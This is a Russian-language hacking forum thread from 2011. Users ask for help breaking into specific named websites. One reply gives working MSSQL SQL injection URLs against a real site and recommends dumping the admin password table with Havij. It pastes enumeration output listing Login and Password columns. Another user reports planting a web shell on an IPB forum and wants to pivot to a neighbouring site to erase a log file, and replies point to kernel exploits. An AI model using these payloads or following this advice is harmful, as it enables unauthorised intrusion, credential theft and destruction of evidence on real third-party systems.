21.12.2011, 19:58
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 10
С нами:
8395350
Репутация:
0
|
|
вопрос технического характера, как отследить HTTPS запрос?
|
|
|
21.12.2011, 20:47
|
|
Новичок
Регистрация: 17.04.2010
Сообщений: 0
С нами:
8457233
Репутация:
0
|
|
Подскажите, здесь есть уязвимость, или только раскрытие путей:
saturn.net/contacts.php?id=4%27
уж больно пути странные пишет...
|
|
|
|
21.12.2011, 22:11
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 90
С нами:
9134867
Репутация:
44
|
|
Подскажите... есть сайт, есть форма. Фильтр на иньекцию -
Код:
function is_secure($string)
{
//todo : better one (maybe, have to check) ver 1 : seems 2 be fine (only a-z 0-9)
$pattern = "#[^A-Za-z0-9]#";
if(@preg_match($pattern,$string)==true) return false;
else
return true;
}
Если делаем так :
preg_match обламывается на том, что ему передаётся массив, а не стринг. Можно ли что-нибудь кроме раскрытия путей замутить ? |
|
|
|
21.12.2011, 22:21
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от DeepBlue7
Подскажите... есть сайт, есть форма. Фильтр на иньекцию -
Код:
function is_secure($string)
{
//todo : better one (maybe, have to check) ver 1 : seems 2 be fine (only a-z 0-9)
$pattern = "#[^A-Za-z0-9]#";
if(@preg_match($pattern,$string)==true) return false;
else
return true;
}
Если делаем так :
preg_match обламывается на том, что ему передаётся массив, а не стринг. Можно ли что-нибудь кроме раскрытия путей замутить ? нельзя
|
|
|
|
21.12.2011, 23:01
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от DarkMaster
Подскажите, здесь есть уязвимость, или только раскрытие путей:
saturn.net/contacts.php?id=4%27
уж больно пути странные пишет...
Только раскрытие путей.
Но имеются другие уязвимые параметры и они говорят, что стоит база MSSQL , например:
http://saturn.net/news.php?id=430+order+by+datalength(@@version)+--+
http://saturn.net/news.php?id=convert(int,db_name()+COLLATE+SQL_Lati n1_General_Cp1254_CS_AS)+and+1=1
а, дальше вбиваешь этот url в havij и раскручиваешь да таблицы с паролем от админки
Count(name) of syscolumns Where id=(SELECT id FROM sysobjects WHERE name=char(119)%2bchar(95)%2bchar(83)%2bchar(105)%2 bchar(116)%2bchar(101)%2bchar(85)%2bchar(115)%2bch ar(101)%2bchar(114)) is 6
Column found: FullName
Column found: id
Column found: isEnabled
Column found: isSuperUser
Column found: Login
Column found: Password
|
|
|
|
22.12.2011, 11:24
|
|
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
С нами:
8265206
Репутация:
84
|
|
http://www.kupibt.ru/catalogue/ID_19467
А эту как?
|
|
|
|
22.12.2011, 14:29
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от shadowrun
http://www.kupibt.ru/catalogue/ID_19467
А эту как?
А где ты тут скулю видишь?
|
|
|
|
22.12.2011, 15:19
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Имею 2 сайта на 1м IP адресе,обычный сайт и форум IPB,в форум IPВ я залил шелл,мне нужно попасть на 1й сайт,чтобы почистить там 1 лог файл..есть варианты как переместиться на 1й сайт?..шелл определяет пути и т.п к 1му сайту но туда пройти не может.
|
|
|
|
22.12.2011, 15:22
|
|
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
С нами:
8686406
Репутация:
265
|
|
Сообщение от alerondel
Имею 2 сайта на 1м IP адресе,обычный сайт и форум IPB,в форум IPВ я залил шелл,мне нужно попасть на 1й сайт,чтобы почистить там 1 лог файл..есть варианты как переместиться на 1й сайт?..шелл определяет пути и т.п к 1му сайту но туда пройти не может.
Смотри версию ядра и ищи сплоит
|
|
|
|
22.12.2011, 15:28
|
|
Постоянный
Регистрация: 02.02.2011
Сообщений: 727
С нами:
8039126
Репутация:
-6
|
|
Сообщение от alerondel
Имею 2 сайта на 1м IP адресе,обычный сайт и форум IPB,в форум IPВ я залил шелл,мне нужно попасть на 1й сайт,чтобы почистить там 1 лог файл..есть варианты как переместиться на 1й сайт?..шелл определяет пути и т.п к 1му сайту но туда пройти не может.
/thread296327.html
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
